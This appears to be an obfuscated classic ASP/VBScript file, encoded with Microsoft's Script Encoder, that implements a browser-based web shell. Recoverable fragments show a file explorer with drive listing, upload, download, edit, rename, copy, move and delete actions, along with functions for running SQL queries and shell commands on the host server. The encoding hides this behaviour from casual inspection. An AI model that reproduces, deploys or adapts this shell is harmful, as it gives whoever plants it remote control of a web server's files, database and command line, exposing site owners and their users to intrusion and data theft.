YnD(O:dP3~F@#@&77g+6O@#@&dnx9~b0@#@&@#@&dk6`bO+s?OlMY~Q,mW!UYDqDnh/,@!{POWOC^sGV9nDkPQ~DWYCswks+kb,Y4x@#@&dik6cYKYCVwWs[D/,QPDWYmsok^+kP@!'~rD+h2	[#,Y4n	@#@&77i+UN&[,'~DWDlVwk^n/@#@&7dVdn@#@&di7+	Nq9~xPbY:3x[~ POWDCVwWs[D/@#@&idnx9~b0@#@&diBI/aGxk+ MkOn,kYh?DlDD~QP1W!xO+.(D+h/,RPDWOC^sWs[DdPL~rPR,J,[Px9(N@#@&7d1W;UD+D,xPZ@#@&i7oWMP1W;xOnMq[P{~kD+hjDlDO~3P^W!UD+.&Y:/,O,OWDlssKV[nM/PDGPxN&[@#@&idiInNrh,w.+knD7+~hHsksndkdYv^KEUD+M#@#@&di7:HsrVSrdD`mK;xD+D*~xPU+k/rWUcr:zsbs+dkdOr#`^G!xO+M(9#@#@&didmKE	O+M'^W!xOnM_F@#@&didmK;UYD&Yn:d~{P^W!UYD(O:/~Q,F@#@&i7g+aD@#@&d+	N,r0@#@&@#@&ikWcbY+s3x9P@*{~OWDl^sGV[nM/~_,OWDlsobV+db,Y4+	@#@&d7sX&x0KRm[N,JWk	kd4NJB~YME+@#@&7+^/@#@&d7hHqU0K l9N~E6kxrd4+[JB~6lsk+@#@&dx9~k6@#@&@#@&dArDtPszq	0W@#@&7dcl9N~JOGDlssKsNDdEBPYGOmVoW^[Dd@#@&idRmN9~JDWOl^srs/JB~YKYl^orV/@#@&7d C9N~JbO+s?OCMYJS~bYn:UOmDO@#@&i+x9PSrY4@#@&@#@&dWr^+/6GV9+DkJr/DP{P%/ OK9jrgcJkYCO!/JS~sX(x6GBPOME#PLPrSJ,[~LkROGx?rgcJ6WV9n./r~,:zsGs9+.SbdYBPO.!+#~',JSJ,',LdcYK9?}1vE0bVn/r~~hHsk^nSb/YB~OD!+*@#@&+U[,0;x1OkKx@#@&@#@&?3JAZPP;)U2~sW9+@#@&Zzj2,Jn6aVG.DJ@#@&dmLlX3aw^WM+.`b@#@&d]+k2W	/n xN@#@&@#@&/bU3,JhmwGDk7+ME@#@&d]+kwGUk+Rq.kD+PrC^YbW	In/2G	/nP{~	r@#@&7"+/2G	/nRq.bYn,lNl6tla9Db\nDv#@#@&iI+k2W	/+c	.kD+,JNiE@#@&d]+k2W	/n AxN@#@&@#@&/bU3,J.:K\+GDb-+MJ@#@&iIndaWxknRqDkDn~JmmDkGx]nkwGxknP{P`E@#@&d]nkwGxknc.bYPlNlX]+sW-+GDr-D`*@#@&iI+k2Gxk+c.kOn,JNir@#@&iIndaWxdnc2UN@#@&@#@&/z?APJ	+Sok^+E@#@&d]nkwW	d+cDbOnPrl1YrWU]/2W	d+,'~`r@#@&7]/2W	dR	MkD+PmLma1hok^+cb@#@&d"n/aWxkn MkD+~JNIr@#@&d"n/aWUdR2U[@#@&@#@&;)U2~rxhsKV9nDr@#@&d"+d2Kx/ MkY~El1YbWUIndaWU/~',	E@#@&dIndaWU/ qDrD+,lLm6gnhwWsNDcb@#@&d"n/aWxkn MkD+~JNIr@#@&d"n/aWUdR2U[@#@&@#@&;)U2~rmKwXr@#@&7I/2W	/n qDkDnPrlmDrGx"+kwGxdn,'~	r@#@&iIndaWxdnc.kDn,l%m6;WwH`*@#@&iIn/aWUdRMrYPJ)IE@#@&d"+dwGUk+ 2	[@#@&@#@&/z?2~EsW-+r@#@&d]/aWxk+c	DbYnPrl^ObWx"n/aWxkn~',	r@#@&d]nkwGxknRqDrOPl%CXHG\c*@#@&iI/wKxknRqDrYPENpJ@#@&7I/wKUd+c2	N@#@&@#@&;bj2,ENVnOJ@#@&7"+dwKUk+ qDbY+,Jm^YbWUI/2G	/+,xPPJ@#@&7]+kwKxd+ 	MkO+,CLm69n^+Ync*@#@&d"nkwG	/RMkDnPr8IJ@#@&7]/wKU/R2	[@#@&@#@&;bj2~EMEU?5JJ@#@&7]/wGUk+ MrD+~rl1YkKx"n/aWU/Px~PJ@#@&7I/wKUd+cMkO+~CNlaI!U?5Scb@#@&d]nkwGxknc.bYPJ)ir@#@&iIn/aWUdR2	[@#@&@#@&;)j2,JMEUZ\9r@#@&d"n/aWUdR.rD+~Jm^DkG	I/wKxknP{P`J@#@&7]/wKU/RMrO+,lNlaI;U;H9`*@#@&iIndaWxdnc.kDn,JNpJ@#@&d"+k2W	/nRAx[@#@&@#@&;)?APJ^GCNwk^+E@#@&7"+dwKU/R	.bY+~EmmOkKU"+daW	/+,',`J@#@&7I/2G	/+c	DbY+,C%lXSKl[srs`b@#@&7I/2G	/+ 	MkO+,E)iE@#@&iI+kwKU/R3x9@#@&@#@&ZbU3Pr/l7nok^+r@#@&d]nkwGxknRqDrOPJC^DkGx"nkwG	/P',	r@#@&iIn/aWUdRMrYPlNCa?m\srVnc*@#@&d"n/aWUdR.rD+~J)Ir@#@&iI/wKxknRAx[@#@&@#@&/z?2,EDxlsnok^+r@#@&d]nkwGxknRqDrOPJC^DkGx"nkwG	/P',	r@#@&iIn/aWUdRMrYPlNCaIxm:nsrs`b@#@&7I/2G	/+ 	MkO+,E)iE@#@&iI+kwKU/R3x9@#@&@#@&ZbU3PrD+	Ch+wW^NnDE@#@&d]+k2W	/n qDkOn,JCmDrKx]/aWxk+,xPPJ@#@&iIndaWxknRqDkDn~lNlXInxChsGV9nDv#@#@&iI+d2Kxd+c	MkOPr8ir@#@&7I/2W	/n AxN@#@&@#@&ZbU3~JkmMk2YE@#@&dGx,nDMW.~M+/;hPU+XO@#@&7"+kwW	/ mKxO+	YOza+'rCwaVk1COkKxJ6RLC-m/^Db2Yr@#@&7"+/2G	/nR;C1tn;W	YDKV,xPrn;4^k^E@#@&d"n/aWxkn MkD+~ACdv*f^W9+cd1Dk2O*@#@&d"nkwG	/R+	N@#@&@#@&Z)?APEdDXVE@#@&dW	~nDMWMP.+d;s+~xaY@#@&7]/wGUk+ mKUD+UDYHw+{JDn6Dz^/kJ@#@&iI+k2W	/+c/Cm4+;WUY.G^PxPrKE(Vr^r@#@&7]/2W	dR	MkD+P~lknvWfnmKNncs+NbC{kYX^nb@#@&d"+dwGUk+ +	[@#@&@#@&/z?2~E9WAx^GmNE@#@&iWx,+M.WMP.+kEhn,x+XO@#@&dfbh~0bV@#@&d]nkwGxknR~EWWD'P.!+@#@&iWbVn,',I+$EdYvJWk^+Eb@#@&dGGh	VWm[ok^+,0GV[nMSGmmOkKx~',0ksn@#@&7IdaWUk+c+x9@#@&@#@&;bj2,Jrhmo+r@#@&iWx,n.DKD,Dn/;hPU+XO@#@&d9rsPkhL&N@#@&i]/2Kxk+R;W	O+	YPXa+xEb:lTnzTk0r@#@&d"+kwGxdncZCm4nZKxO.KVPx~rn;4^r1J@#@&db:o&N,xP"+5E/Ocrk:TrNr#@#@&7j2d2;K~Z)jAPr:T(N@#@&7/z?2~E^WCNbUTJ@#@&diI+kwKU/R$k	l.zqDkDnP~l/*KKAUK]`rhT{sWm[k	ob@#@&dZ)jAPENb.r@#@&id"+/aW	d+cArxmDz	MkY~Am/++*PW~?:IckhL|NrD*@#@&iZ)jAPJs-!wE@#@&7iInkwKx/R~rxmDzMkOn,AlknvWKW~jPIvksomV-ia#@#@&i/bU2~ED6YE@#@&d7IdaWUk+cAk	lMzMkO+,ACdvc:GAUKIvrho|YXYb@#@&7;bj2,EksoE@#@&dd]nkwGxkncAr	lMXMkDnP~ld++cPG~?K"ckso{bhL#@#@&iZ)?3~ASj2@#@&diIndaWxdncArxm.H.bYPAm/c:W$?:Icrso{!U3	Wh*@#@&dA1GPj2J3;K@#@&i]+kwGUk+RnU9@#@&@#@&/z?3,J7k+SJ@#@&dKx~+MDG.,D+k;:PxaO@#@&dGkhPnaDkhoB~sbVS~b:lLnhlOt@#@&iInkwKx/R~;06+.':D;n@#@&dbhlT+nmO4P{P"+5EndD`EksConCO4J#@#@&@#@&7q6c`mCk+vs?}RVnYA6O+	/rG	1lsn`b:lTnKlDt*#~'~Exn!J,GD,j^Ck+`oj}R!+D3XYn	/bWxglsn`b:ConCO4##,xPr9nA!EPKD,j^ldnvsjrc!+D2aOx/rG	1C:cb:CT+hlY4#*~',JBnAJb~:t+	@#@&id+XOr:TP{PEkhCT+&Lanor@#@&7AV/nr6`immd`oUrcM+D2XO+	/rW	1Ch`ksConlD4b#,',J!qoE*PPtU@#@&d7nXYkhL,'~JbhmonJob0J@#@&i3Vk+r0vj^Ck+`wjrcM+D3aYxkkGxHCs+cksConCO4##~x,J$HhE*PP4+	@#@&idaYb:LP{PErslo&4swJ@#@&72^/@#@&d7nXYr:T~',Jrhmo+&2	oE@#@&7Ax[,k6@#@&i?OPwksP{Poj}RMOsbV+vrhlT+hlOtb@#@&d]+k2W	/n ;WxOn	YPXan{+aDkso@#@&d"n/aWU/R/C1t+;GxDDW^~xPrn!4sk^E@#@&7B"n/aWUdRb[[_+CN.,J/KxD+xDOdnxTY4JBPor^R?b"+@#@&d"ndwKxk+ ArUmDzMrYP.nmNArUmDzsbs`obVcwlDt*@#@&i?nY,srs,'PgGY4kxT@#@&d"+kwGxdnc+UN@#@&2gf~jAS2/P@#@&@#@&bWv:G9+,'PrEasWmNE#,Y4n	@#@&@#@&Nb:P^rU3~l13@#@&@#@&"+dwKU/R	.bY+~E@!tO:^@*r@#@&"+kwW	/ MkO+,J@!4lN@*E@#@&I+k2Gxk+c.kOn,J@!YbOV@*E~LPld2:kOV~LPE@!zDkY^+@*E@#@&In/aWUdRMrYPJ@!hnYmP4YOwRn$Er\{EJ;WUOxYRPHwnJr~1WUD+	Y'rJDn6Dz4YsVI~1tlMd+D'EDWR%rJ@*J@#@&]nkwGxknRqDrOPJ@!\AK)P_P:nRAp`q.{JrKDmohlrJ~/}1KAHK{JJ	GRmmm4+EJ@*E@#@&]+k2W	/n qDkOn,J@!HAPzPu:KhO25j&#'rJ36ak.nkJJ,/rgK2gPxJrO8JE@*E@#@&@#@&IdwKxdncDrOPE@!^r	3~M+^'Jr/DzV/4+YEE,tDW'rJgsG[+{/DXs+EE,YzwxJrYnaDzmddrJ~z@*E@#@&]/aWxk+c	DbYnPr@!&4lN@*E@#@&I+k2Gxk+c.kOn,J@!4K[X@*J@#@&@#@&IndaWU/ qDrD+,J@!9k7~l^kLx{JE^xY.Jr@*J@#@&]+kwKxd+ 	MkO+,E@!Dl8sPmns^wCN9r	oxrJyJJ,msVkwCmbxLxrJ rEPSkND4xJr*Z!EJ@*E@#@&]+k2W	/n qDkOn,J@!Y4nmN~,hbNY4'rEFZ!YJrPCsbox{EJ1+xDn.Jr@*r@#@&IndaWU/ MkOn,Jd@!O9P^Vmdk'Er3(DYsJr~l^kLx{JE^xY.JrPmKsdwmx{JE EE@*@!8@*wrVPi2^Wl[@!J4@*@!JO9@*E@#@&"+/aW	d+c.kD+~E@!zY4nl9@*J@#@&@#@&^k	3$l^V,'~jasWmNcWKVNn.dW^lDrKxb@#@&@#@&I/aGxk+ MkOn,J@!:]@*@!Kf,CskTx{B^+UODvP1slk/xEr34.OsJE@*@!),t.0{JJr[,sk	3$l13~'rJJ@*,Amm3Y@!&b@*@!JK9@*@!&:I@*J@#@&I/2G	/+ 	MkO+,E@!zOm4^+@*r@#@&]+kwGxk+ 	MkY~J@!zNb-@*J@#@&@#@&]+d2Kxd+c	DbYn~r@!z8G9X@*J@#@&"+daW	/+cMrYPE@!JtOh^@*J@#@&@#@&I+k2Gxk+c2UN@#@&x[PbW@#@&@#@&9b:P[.b\n{B~9Dr7+M/K6D@#@&i0GD,+C^4PNMr\{PbU~sUrcf.k-nk@#@&di[Db\n.kK+aO,'~NMr7+.kK6Y,[,E@!DD~k9'EE9Dk7nDrP[,[.k7+|R9Dr-SnYDnD,[~ErJ@*@!O9P^Vmdk'Er3(DYsJr@*J@#@&7d9Dr-D/:n6DP',[.k7+M/P+aO,[~J@!CP4DnW{JJE'wks+hCDt'raA6w^WMnD-J'NMk-n|RfMr\S+DOnDLJ=-EJ@*E@#@&7dbWP9Dr-{R9.b\nYH2'q,Y4+x,NMr\DdK6O~{PNMr\D/:naY,[,J'x8dai'x(dwpssGawX~9Mk-+r@#@&d7b0,NDb\mRGDr\Yz2' ,OtxP9.r\DkKn6O~{P[Db-+M/PnXYP'~r[U4k2p[U(/aiCmD9~fb/VJ@#@&77b0P9.k7+{c9.k7+DX2+xf,Y4+	~NMk-nM/KnaDPxP9.b\nM/:+6DPL~JLx8/ai'U(/wpH+DhWMV~fMk7+E@#@&7ikWP9.k7+m GDk-nDX2+{*,Y4x,NDb\./:+aY,'~[Mk\./:+6D~'Pr[	4dwI'	4dwp/N IGhr@#@&779Dr\.kKnXY,'P9Db-+M/P+XY~',JP]EPLPNMr-+|RGDr\nJYO+M~[,JlD@!zl@*E@#@&7dbW,N.b\{RGDb-+DX2+{&~O4+x,[Db\+MdP+XY,'~N.r7+./:n6DP'~r[x8dai'x(dai@!mP4D+6'rELm\C/1Dr2D)DhW7+fMr-+M`EJ~[~[Mk-+| fMk-nd+YOnMP'Prv*iEr@*]I+sW7nT@!zC@*r@#@&7iNDb-+M/KaOP{P9Dr\n.kKn6D~[,PE@!JYN@*@!JY.@*r@#@&dU6D@#@&@#@&"n/aWU/R	.bY+,E@!4Y:^@*E@#@&I/2WUdR	DbO+,J@!4lN@*E@#@&]+k2KxdRqDkD+,E@!DkOV@*E~LPlk2KbYV~'Pr@!JYrYsn@*J@#@&"n/aWUdR.rD+~J@!hYC,tDYw +$;k7'EJ;WUOxY PXa+Jr~^W	YxO'EED+aYJ4YsVI~1tl.dYxEDW %Er@*r@#@&"+k2W	/nRqDrOPJ@!\2:bP_PPn 25j(.xErn.lThlrJ~/}1K3H:'EJ	G mC1tJJ@*J@#@&I/2W	/n qDkDnPr@!HAP)P_K:nR2}i&.xJr36ak.nkJJ~/}1P2gP{JE FrJ@*r@#@&@#@&"+dwKxdncDbO+,J@!^rU3,DVxJEdDXs+k4+YEE,tDnW{JEgsG9+xkYHV+rJ,OXa+xJrYnaDzmkdJrPz@*E@#@&"+kwGxdnc.kDnPr@!d^MkwO~kD^'rEQ:G9+{/mMkaOJrPOXa+xErY+XOzNl\md^DbwDJE@*@!&km.kaO@*r@#@&]/wGUk+ MrD+~r@!kmDbwD~YHwn'rJOnXYzNC\m/mMr2YrJ@*J@#@&]nkwGxknRqDrOPJWWdkdY,x,	E@#@&"+/aW	d+c.kD+~~mLlX(x6W`*@#@&I/aWU/n qDrY~J)iE@#@&I+d2Kxd+c	MkOPr@!zkmMrwD@*E@#@&IndaWxknRqDkDn~J@!z4+CN@*E@#@&]+k2W	/n qDkOn,J@!4K[HPG	VKlN{JrdYmDOSKl[c*JJ@*E@#@&@#@&"ndwKxk+ .rD+~J@![k7Pr[{JJ^G	YCk	nMJE,l^ko	'rEmxO+MJE@*r@#@&@#@&I/wKUd+cMkO+~E@!Nr\,rN{JEO(VCnC9JEPmsboU{Jrm+	Y.Jr@*@!n@*[U8kwi@!&n@*J@#@&]n/aW	/nR	.bYnPr@!0KDh~Kx?;8skO'rESkU9WSRVKmmOkKx tM+W~{PB[36aVWMn.uE_T+Oq[cEDn:KO+E# -mVEn mN[?^Cktc*iM+Y!D	~0mVd+pJE~s+Y4GN{JJaGdYrJ@*J@#@&]nkwGxknRqDrOPJ@!Om4s+,^Vsal9Nk	o{EJZJEP1+sskwl1rxT'JrTEJ@*@!DD@*@!O[,/OX^n'rJ8C13o.G!x[O1G^W.=FyF 8 rEP1VC/k'EE04DDhJr@*[	8dwp[	4dwI'	4dwp@!4@*SG^mYkGU,)@!z(@*Lx8kwp[x(/aI[	4dwp@!&O9@*@!D[@*@!kxa;OP	ls+xJE.:GYEJ,k[xrJDnhKYnJr~7ls!+{BB,YH2+{JEY6OErP/DzV'JrArNDt=&X!2apJE@*@!&Y9@*@!O9@*@!rUaEOPDza+xrJUE4skDEJ,\CV!+xErMW,'Dm;EKIEJ,/DXs+xErhrND4)l!I~6WxORS+ro4O=4G^NpJJ@*@!JON@*@!&YM@*@!&Dl4^n@*r@#@&"ndwKxk+ .rD+~J@!&0KDh@*r@#@&]nkwGxknc.bYPJ@!n@*'x(/2i@!zK@*r@#@&"n/aWxkn MkD+~J@!&9k-@*r@#@&@#@&]nkwWUdR	DbOPE@!Nb\PbN{EJD4s2MDEE,/YHs+{JJ9rdw^lH)UWUnrJ~l^ro	'EE1+xOnMJE@*r@#@&InkwKx/Rq.kD+~J@!YC8^+P1nV^wl9[rxT'rJ+JE~1+sVk2l1kUL{JJ+ErPAk9O4'Er*Z!Jr@*r@#@&"+dwKxdncDbO+,J@!D4nl9P,hrNO4{JEFZT]rJ~C^koUxrJ^+	ODEr@*r@#@&"+k2W	/nRqDrOPJi@!Y9Pm^Cd/{Jr38DOhrJ~/DzV'EE(lmVLMW;x9R1WsKD=F 8 8+JrPCVboUxrJmUYDJr~^W^/alU'EEyJE@*@!8@*AD.GMP"ZZ@!z8@*@!&DN@*r@#@&I+kwKU/R	DbYn~r@!zD4+mN@*r@#@&I/aWU/n qDrY~J@!Y8G9XP8L1WsWMxrJ:2l2l&mJr@*J@#@&]+kwGUk+Rq.kD+Pr@!PI@*J@#@&]+d2Kxd+c	DbYn~rd@!P9,hrND4{JEy!uJJ,m^C/k'EJ04.OsJJ,rN{JJ..ZKNJE@*'U(/2i@!&KG@*E@#@&I+d2Kxd+c	MkOPrd@!:f,Ak9Y4'rJ0TuJJ,^Vm//{EE3(DD:EJ@*@!6WUY,rN{JEnMDfnd1JEP1G^W.{JrD+9Jr@*[	4dwp@!&WKxY@*@!z:f@*r@#@&I/aWU/n qDrY~J@!zP]@*J@#@&]/2W	dR	MkD+Pr@!JO4KNz@*r@#@&]/wKU/RMrO+,J@!zOl8s@*E@#@&]+kwGUk+R	.bYnPr@!~I@*Lx(/wp@!J$I@*J@#@&"+d2Kx/ MkY~E@!JNb\@*J@#@&@#@&@#@&"n/aWUdR.rD+~J@![b\~mVbox{Jr^+	YnDrJ@*E@#@&IdwKx/ 	DbYPE@!WG	Y~k9xJr0WHKJJ~dDXs+{Er0G	Y h+bo4O)(WsNpmGsKD)K.l	o+p[r/aVmXlxGUiEJ@*PWDls~=P@!d2mx~/Dz^+xrJ1WVKD=.+9iEJ,k[xrJYKOl^sW^[nDkJr@*T@!&dalU@*,WW^Nn.v/#~C	N~@!k2mx~kYHV+{Jr^W^W.)M+[IrJPb['rJYKOCVwk^+dJE@*Z@!&/aCx@*PWr^+`db@!A]@*@!dalU,/DXV'rEmKVGD=Dn[pJJ,rN{JJ6GsNDgWEJ@*T@!zdwmU@*,0Gs9+Dcd*PCx9~@!/2mx,/YHVxJrmGVKDl.NirEPbN'rEWk^+gWEJ@*T@!zdwmU@*,0rs`/b~^kdY[,"'	4kwiLx(dwp[U4kwI@!bxw!OPDXwxEJ(EDYGxEE,k['rE4DSGC9:W.nrJ~W	/^k^0'rJVKl9\WM+c#pJE~7lV!n'rJ$dGCN,HKDnTEE,/OX^n'rJ[rkwVCz=xGxI6WUDOS+kTtDl4KV[irJ@*@!J0W	O@*@!AI@*'U4kwpJ@#@&]nkwGxknRqDrOPJ@!Om4s+,r9'ErY(VZKxDnxDJEP1+ssalN9rxT'JrT26rJ,mnVsdal^k	L'rJq2XJJ~AbNOt{Er,XuJrP/DX^n'rJ8WMNn.=FwX~/KVk9~:*9*9*[ihr	OAk9Ot=F+0ZiJE@*r@#@&IdaWUk+cDbY~J@!Y4+mN~AbNY4xJrF!ZYEJ,m^ld/xErYC4^nCl[ErPlsrTxxJr^xODrJ@*r@#@&]+kwGxk+ 	MkY~J@!YD@*E@#@&"+kwGxdnc.kDnPrd@!PGPmsCk/xJrW	lhJr@*@!(@*gC:@!&4@*@!&PG@*J@#@&I/wKUd+cMkO+~Ei@!Pf,^Vm/dxrJ0dr.+EJ@*@!(@*jby@!z(@*@!&KG@*E@#@&IndaWxknRqDkDn~Ji@!:f~msCk/xJrWYHwnEr@*@!8@*:X2+@!&(@*@!JKG@*J@#@&"n/aWU/R	.bY+,Ed@!Kf,^slk/{JE0[CD+EJ@*@!4@*fCOPSCdDP\W9r6kn9@!J4@*@!z:9@*r@#@&I/2G	/+c	DbY+,E7@!:f,msldd{JE09CYJE@*@!4@*9CD+~ZMnmYn9@!J4@*@!z:9@*r@#@&I/2G	/+c	DbY+,E7@!:f,msldd{JE0m^YbWUErPmGskwCx{Er&Er@*@!4@*zmDrW	@!&4@*@!&PG@*J@#@&I/wKUd+cMkO+~E@!zOD@*E@#@&IndaWxdnc.kDn,J@!JY4+l9@*r@#@&"+dwKxdncDbO+,J@!D8GNHPbNxJEO(VJkkOJrP8L1WVG.{JEa2C2lfmJr@*J@#@&"n/aWU/R	.bY+,E@!JY4K[z@*r@#@&In/2G	/nRq.kD+~E@!Y4G[HPrN{ErY8^ZK::mx9EJ,hrNDtxErF!ZYJr@*J@#@&]+kwKxd+ 	MkO+,E@!DD@*E@#@&IndaWU/ qDrD+,Jd@!KG@*[	4dwp@!&PG@*J@#@&I/wKUd+cMkO+~Ei@!Pf@*@!z:f@*E@#@&IndaWU/ qDrD+,Jd@!KG@*@!JK9@*r@#@&]/wKU/RMrO+,Ji@!Pf@*@!JK9@*r@#@&"+d2Kx/n qDrY~rd@!:f@*@!z:f@*E@#@&In/aWUdRMrYPJi@!Pf,l^kLxxErmnxDnDrJ@*@!bxw;O,YzwxEm4m04WXB,OkDVn'E?nsmY,)V^BP1sC/k'E6^tn^0B~xmh+{B^4m38GXbsVE~Kx/^k13'Em4nm0bsVvY4rk#iE~\mVExvl^VE@*@!zP9@*J@#@&"n/aWUdR.rD+~Ji@!:f~mVbox{Jr^+	YnDrJ@*@!bxw!OPDXwxEJ(EDYGxEE,WUZ^rm0'EEG+VnO`birE,\C^E'Jrfs+D+~[Ml5;KiJr~/DXVxEJ6W	YRhnrTtO)(GV9iEE@*@!zP9@*J@#@&"nkwG	/RMkDnPrd@!KG@*@!&:f@*r@#@&"+/aGU/RqDrYn~r@!&YM@*J@#@&]nkwWUdR	DbOPE@!zD4W9X@*E@#@&In/aWUdRMrYPJ@!O8W9X,hrNO4{JEFZT]rJ@*E@#@&IndaWU/ qDrD+,J@!DD@*E@#@&In/aWUdRMrYPJi@!Pf@*@!bx2EO~DX2+{EJ(EOOKxJE~Kx/Vb^0'ErxhsKV9nDv#IJrP-C^E+{EJg+h,oGV9+MP'DC5!WIJr~/DXsn{JJWG	YRhrTtO=4KVNpJr@*[	4dwp[U8kwiLU4kwi@!rUw!Y,YzwnxrJ8EDOW	JE~KxZsr13xJrUhobV`#pJr~\mV;+{JEHhPwrVP[MC5EKirJ~/Oz^+xJrWW	YRAko4O=4GV9IrJ@*Lx(/wp[	8/ai'x(/2I@!kxa;Y,YXanxJr4!YOWUErPGx;sk13xErhkU[Kh VK^mYrKxctD0{va`wsWmNkv300dr/DRk	WGRalDt l[[UVC/4c#pJE~7lV;n{JEjasKl[,[Ml;!WpEJ,/OX^+xEr0W	OOS+kT4O)(W^NIJE@*@!zPf@*E@#@&IndaWxdnc.kDn,J@!6WM:PKxU;4skO'rJ/GaXHK-+vBmK2zBBPT+Oq[cEDn:KO+;W2zE#R-C^En#p.Y;Mx,0l^/IJr@*E@#@&IndaWxknRqDkDn~Ji@!:f~lsrTxxJr.kTtOErPmGskwCx{Er Er@*;WwHPknVmO+9PrO:`kbPDWP=@!&KG@*r@#@&IndaWU/ MkOn,Jd@!PGP^W^dalU{Jr Jr@*@!rxaEOP	lhn{JJMn:KY+;G2XrJ,k['EEM+hWDnZKwzErP\Cs!+xBE~DX2'rJY6DEJ,/OX^+xErhk9Ot= *Z2airJ@*@!rx2;DPOXan'rJd;(:kOErP-l^;'ErMKP[Ml$;WpJEPkYzs'JrAk9Yt=XTi,0KxOOAnbo4Y=8W^NIEr@*@!&PG@*E@#@&]/2Kxk+RqDbO+,J@!z6W.h@*J@#@&]+kwW	dnRqDbYnPE7@!K9P1GVkwCU{JJfEr@*@!z:9@*J@#@&I/wKxknRqDrYPE@!JYD@*E@#@&I+k2Gxk+c.kOn,J@!zD8W9X@*E@#@&IndaWU/ qDrD+,J@!D4K[X,PAk9Y4xrJFZT]rJ@*r@#@&I/aWU/n qDrY~J@!Y.@*r@#@&]nkwGxknc.bYPJi@!:9@*Lx8/ai@!&:f@*r@#@&"+/aGU/RqDrYn~r@!WWMhPKxj;(:kOxrJ/WaztW-`E:W7+ESPT+Oq9`v.:WDnHK\+Eb \mV!+bi.nDE.x,Wl^/nIrJ@*E@#@&In/aG	/ncMkYPr7@!:f~l^kLU{JJMro4YJr~^W^/alU'EEyJE@*tG\Pdn^+mOn9PrYhv/b,YKP)@!z:9@*r@#@&I/2G	/+c	DbY+,E7@!:f,mGVd2mxxJr+Jr@*@!r	wEO~	lh+{ErDnsWD+HK\EJ,k['rJ.nsWY\W7+Jr~-l^E'vB~OHwn'rEY6OErP/Oz^+xJrAbNO4)y*!a6pEJ@*@!rxaEO~DXwxJr/E(hrYrJ,\CV;n{JEMK~[Ml5;KiJE~kYzVxrJAbNDt)l!p~0KxOOS+rL4Y)(GV9iJr@*@!z:f@*J@#@&]nkwGxknRqDrOPJ@!&6W.:@*E@#@&]/aWxk+c	DbYnPrd@!PGPmKs/alx{EE&rJ@*@!&K9@*r@#@&IdwKxdncDrOPE@!JOM@*E@#@&"+/aW	d+c.kD+~E@!zY(GNH@*J@#@&]+kwKxd+ 	MkO+,E@!JYC8^+@*E@#@&In/aG	/ncMkYPr@!z9k-@*r@#@&@#@&@#@&"n/aWxkn MkD+~J@![b\~l^ro	'EE1+xOnMJE@*r@#@&InkwKx/Rq.kD+~J@!YC8^+Pb['rJY(sKk1Y!DnJE~kYzVxJrNrdaVlzl	WU+rE,lsbo	'JrmUYDEJ,hr[Dt'rE,l]Jr@*@!K"@*@!K9PCsboU'E^+	Yn.EPmsCk/xJrV(DOsJr@*@!zP4.+6'EJNl-CkmDb2Y=/tKA\W9+vB362sKDnDESPDD;n*iJE@*]ACm0~DW~~DKh/DY@!zz@*@!z:f@*@!JKI@*@!YM@*@!D[~l^kTxxB^n	YnDE~m^ldd{JJV8MYhJr@*@!khTPbN'rJbhohk^Y!DnErP/M^'rJJ,'~sbVnCY4~LPEgsGN'rhmo+'rso(N{sKl[bxTJJ@*@!JON@*@!&YM@*@!&Dl4^n@*r@#@&"ndwKxk+ .rD+~J@!$I@*[U8kwi@!&~I@*J@#@&"+daW	/+cMrYPE@!JNr-@*J@#@&@#@&"+/aGU/RqDrYn~r@![k7~k9'EED4Vor^+3NbOrJ~kYHV+{Jr[kkwslH)UG	+Jr~l^ko	xEJ1+	YnDEE@*J@#@&"n/aWUdR.rD+~J@!WKDh,:YtKN{EJaWdYrJ~G	?E(hkD'JrdC\sbVn`bIM+OEMUP6lsdiJE@*r@#@&IdaWUk+cDbY~J@!YC4^+~^^l/kxJr34MOhJr@*r@#@&IndaWU/ MkOn,J@!P]@*@!Pf,C^kL	'Em+	Y.B@*@!)P4DnW{JJNC\m/mMr2Y=/4WAHG[`v2X2VKDn.E~PO.!+birE@*$$mm0PYKP~.WS/nDY@!&)@*@!z:9@*@!zK"@*E@#@&I/2WUdR	DbO+,J@!OM@*J@#@&"+dwKUk+ qDbY+,J@!ON,lskTxxErm+	O+MJJ@*E@#@&"+kwGxdnc.kDnPr@!8@*ANkO~6ks+,l,@!WKxDPmKVK.'KDCxT+~r9'Jrs4^sk^nEJ@*JL0GV[nMSGmmOkKx'E@!z0GUD@*@!z(@*@!4.@*J@#@&I/aGxk+ MkOn,J@!Dn6DlDC~xm:'EJOaDZGxDnxDJE~bN'EED6OZKUD+UDJrP/DX^n'EhrNDtl0Z!i4nkTtY=T!pB@*J@#@&]nkwGxknRqDrOPJE@#@&In/aG	/ncMkYPr@!zD+aYmDnC@*J@#@&]+kwW	dnRqDbYnPE@!(D@*@!(.@*@!kU2!YPOza+x/!8skO,\mVE'rE)=Pjl7+~l=JJ@*@!4M@*@!JO[@*@!zDD@*@!O.@*@!ON,CVboUxrJmnUD+.Jr@*r@#@&"+kwW	/ MkO+,J@!&DN@*@!&YM@*@!JOC4^+@*@!&0G.s@*E@#@&]+kwGUk+R	.bYnPr@!JNr7@*r@#@&@#@&@#@&I/2W	/n qDkDnPr@!Nb-~k9'rJO4siaVGl9EJ,/Oz^+'EE9kdw^CH)UKxJJ,l^ro	'EJ1+UODJr@*J@#@&Id2W	/R	DrOPE@!DC4^+~AbNY4xrJ!ZEr@*E@#@&"+/aW	d+c.kD+~E@!KI@*@!KGPl^rLx{B1+UYn.EP^Vmd/{JEV(DYhEr@*@!b,4M+W{JrLl7lk^DbwO)ktGAtWNcBA6w^G.+MBBPOD;n*iEJ@*,AmmV~DWP$.Khd+MD@!z)@*@!JKf@*@!JPI@*J@#@&"+d2Kx/ MkY~E@!DD@*@!ON~^^ld/{EJ04.OsJJ~C^kLx{Ermn	YDJr@*dGmmYrW	Pl~@!4@*@!WW	YP1GsWM'KDCxLn,k['rEEaVGC9SW^CDkGxrE@*@!&6W	Y@*@!z(@*@!JY[@*@!zO.@*J@#@&]+kwW	dnRqDbYnPE@!DD@*@!D[PmVrL	'JE^xO+MErP^^lk/'rJ08DD:EJ@*J@#@&"+/aGxk+Rq.rYPr@!WW.h,xC:xJr0.h`wVGC9JEPsnDtG9'rJwK/DEJ,+UmDX2n{JJs;VDkwm.Oz6WM:RNCOmJEPm^YbWUxrJJ~',srVKmY4,[,JgsW9n'!wsWmNEE,qf{EJ6D:`2sWmNrJ@*J@#@&"+dwKU/R	.bY+~E@!kUw!O,Yza+{tk9NUP	lh+{JEsbx3~Cm0JJ,r['rJ^kU3$C13EJ,-l^EnxrJaEE@*J@#@&"nkwG	